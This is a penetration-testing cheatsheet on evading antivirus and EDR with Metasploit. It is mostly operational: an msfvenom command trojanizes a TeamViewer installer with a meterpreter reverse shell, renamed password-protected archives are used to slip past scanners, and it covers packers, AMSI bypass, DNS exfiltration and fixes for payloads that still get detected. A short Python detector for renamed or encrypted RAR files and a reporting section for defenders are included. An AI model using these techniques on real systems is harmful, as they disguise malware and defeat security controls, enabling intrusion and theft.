🛡️ Methodology Checklist
- Identify AV/EDR on target
- Use an MSF evasion module: use evasion/windows/windows_defender_exe
- Combine with process injection payloads
- Obfuscate PowerShell: Invoke-Obfuscation or manual string manipulation
- Use staged payload to reduce initial footprint
- Test generated payload against target AV offline before deployment
- AMSI bypass in PowerShell if running PS-based stage
🎯 Operational Context
Use when: Standard MSF payloads are detected by EDR — use MSF evasion module or custom templates to reduce detection surface.
Think Dumber First: evasion/windows/applocker_evasion_presentationhost and similar modules already exist in MSF — run search evasion first. For real EDR bypass, combine MSF with Donut or manual PE injection.
Skip when: Simple payload works without evasion — don’t add complexity unnecessarily.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| msfvenom -p [PAYLOAD] LHOST=[TARGET_IP] LPORT=[PORT] -k -x [LEGIT].exe -e x86/shikata_ga_nai -a x86 --platform windows -o backdoor.exe -i 5 | Inject payload into legitimate exe (template + encoding) |
| rar a [FILENAME].rar -p [FILENAME] | Create password-protected RAR archive |
| mv [FILENAME].rar [FILENAME] | Remove extension to evade automated scanners |
| wget [URL]/rarlinux-x64-612.tar.gz && tar -xzvf rarlinux-x64-612.tar.gz && cd rar | Install RAR on Linux |
| msf-virustotal -k [API_KEY] -f [FILE].exe | Test payload against VirusTotal |
🔬 Deep Dive & Workflow
Defense Landscape — Know What You’re Bypassing
Endpoint Protection (Host-based):
- Software AV/EDR on the host itself (Avast, CrowdStrike, Defender)
- Combines AV + anti-malware + host firewall + anti-DDoS
Perimeter Protection (Network-based):
- Physical/virtual devices at network edge
- DMZ: buffer zone between internet and internal LAN
- IDS (detect) vs IPS (detect + block)
How Detection Works — Four Methods
| Method | How It Works | Bypass |
|---|---|---|
| Signature-based | Known attack pattern matching (byte signatures) | Encoding, custom shellcode, obfuscation |
| Heuristic/Anomaly | Deviations from behavior baseline | Blend with normal traffic, slow down |
| Stateful Protocol | Detects protocol anomalies vs RFC definitions | Use legit protocol wrappers |
| Live SOC monitoring | Human analyst with live feeds | Anti-forensics, timing, legitimate-looking traffic |
Executable Template Injection — Best Disk-Based Evasion
Embed malicious shellcode inside a signed, trusted binary. The binary’s valid signature and icon reduce suspicion:
```shell
# -k: run the payload in a separate thread so the original app still runs normally
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k \
  -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe -i 5
```
-k is critical: without it, the original app crashes immediately, revealing the malware.
Archive Evasion — Bypassing Automated Scanners
AV engines often can’t scan inside password-protected archives:
```shell
# Install RAR on Kali
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
# Archive with password (-p with no attached value prompts for the password; payload.js is the file being archived)
rar a payload.rar -p payload.js
# Remove extension (fools automated content-type scanners)
mv payload.rar payload
```
Admin may still manually inspect. Use when bypassing automated email/web gateway scanners.
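A gateway-side counterpart to the trick above, added here as an example (not part of the original notes): type the file by its content rather than its extension, walk the RAR4 headers for the password flags, and quarantine what cannot be scanned. The sample archive is constructed inline with dummy CRCs and filler data, not produced by rar.

```python
import struct

RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
MHD_PASSWORD = 0x0080  # main-header flag: headers themselves are encrypted (rar -hp)
LHD_PASSWORD = 0x0004  # file-header flag: file data is encrypted (rar -p)
LONG_BLOCK = 0x8000    # block is followed by ADD_SIZE bytes of data (packed file data)

def identify_rar(data: bytes) -> dict:
    """Classify bytes as RAR by magic and walk RAR4 headers for encryption flags and file names."""
    info = {"is_rar": False, "version": None, "encrypted": False, "files": []}
    if data.startswith(RAR5_MAGIC):
        info.update(is_rar=True, version=5)  # RAR5 block layout differs; the magic alone is the signal here
        return info
    if not data.startswith(RAR4_MAGIC):
        return info
    info.update(is_rar=True, version=4)
    off = len(RAR4_MAGIC)
    while off + 7 <= len(data):
        _crc, btype, flags, size = struct.unpack_from("<HBHH", data, off)
        add_size = struct.unpack_from("<I", data, off + 7)[0] if flags & LONG_BLOCK and off + 11 <= len(data) else 0
        if btype == 0x73 and flags & MHD_PASSWORD:
            info["encrypted"] = True  # encrypted headers: nothing further is readable
            break
        if btype == 0x74 and off + 28 <= len(data):
            if flags & LHD_PASSWORD:
                info["encrypted"] = True
            name_size = struct.unpack_from("<H", data, off + 26)[0]
            name_off = off + 32 + (8 if flags & 0x0100 else 0)  # 0x0100: 64-bit size fields present
            info["files"].append(data[name_off:name_off + name_size].decode("latin-1"))
        if btype == 0x7B or size == 0:
            break
        off += size + add_size
    return info

def scan_upload(filename: str, data: bytes) -> list:
    """Gateway-style findings: the file type is decided by content, never by extension."""
    info = identify_rar(data)
    if not info["is_rar"]:
        return []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    findings = []
    if ext != "rar":
        findings.append(f"{filename}: RAR{info['version']} content with extension {ext!r} (renamed archive)")
    if info["encrypted"]:
        findings.append(f"{filename}: password-protected archive, contents not scannable: {info['files']}")
    return findings

def rar4_sample(encrypted: bool) -> bytes:
    """Constructed minimal RAR4 image for testing (dummy CRCs, filler instead of compressed data)."""
    main = struct.pack("<HBHH", 0, 0x73, 0, 13) + b"\x00" * 6
    name, body = b"payload.js", b"\x00" * 4
    fflags = LONG_BLOCK | (LHD_PASSWORD if encrypted else 0)
    fhead = struct.pack("<HBHHIIBIIBBHI", 0, 0x74, fflags, 32 + len(name),
                        len(body), 4, 0, 0, 0, 29, 0x30, len(name), 0x20) + name
    return RAR4_MAGIC + main + fhead + body + struct.pack("<HBHH", 0, 0x7B, 0x4000, 7)
```

A real gateway would run this on every attachment and block or sandbox anything that comes back with findings, since the stripped extension and the password are exactly what keep the content out of the AV engine.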
Packers — Compress + Obfuscate
Packers compress the executable and add a decompression stub that unpacks into memory at runtime. This changes the on-disk hash/signature:
- UPX — simple, widely supported, but well-known to AV
- Enigma Protector — stronger obfuscation, license required
- Themida — anti-debug, anti-VM, very strong
- MPRESS — free alternative to UPX
Network Evasion
- Meterpreter AES encryption — hides command content from network IDS/DPI; doesn’t hide that it’s C2 traffic
- DNS exfiltration — tunnel data inside DNS TXT records to bypass firewalls (inspired by Equifax breach)
- Port selection — use 80/443/53 to blend with normal traffic
Exploit Code Modification (Buffer Overflows)
To evade IDS signatures scanning for specific buffer patterns:
```ruby
# Use randomized offsets in the module target definition
'Targets' => [
  ['Windows 2000 SP4 English', { 'Ret' => 0x77e14c29, 'Offset' => 5093 }],
],
```
Avoid standard NOP sleds (\x90\x90\x90...) — heavily signatured. Use alternative NOP equivalents (\x41 = INC EAX, \x43 = INC EBX).
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| MSF evasion module not found | Wrong search terms | Run search type:evasion to list all evasion modules |
| Evasion module generates file but still detected | Behavioral detection | Evasion modules target static detection only; use process injection for behavioral bypass |
| Template EXE approach fails | Template binary flagged | Use a legitimate signed binary as template; check MS-signed binaries |
| AMSI bypass in payload fails | AMSI patched by Defender | Use reflective loader that patches AMSI in memory before payload execution |
| Payload detected after obfuscation | YARA rules on patterns | Change variable names, reorder operations, split shellcode array across multiple variables |
📝 Reporting Trigger
Finding Title: EDR Evasion Achieved via Payload Obfuscation and Custom Loading
Impact: Advanced evasion techniques allow malicious payloads to execute on EDR-protected endpoints without triggering behavioral alerts, maintaining persistent access while evading incident response detection.
Root Cause: EDR solution relies on known-bad signatures and limited behavioral heuristics. No memory forensics or process injection detection.
Recommendation: Deploy EDR with memory scanning and process injection detection. Implement PowerShell Constrained Language Mode and AMSI. Ensure EDR telemetry is forwarded to SIEM for correlation.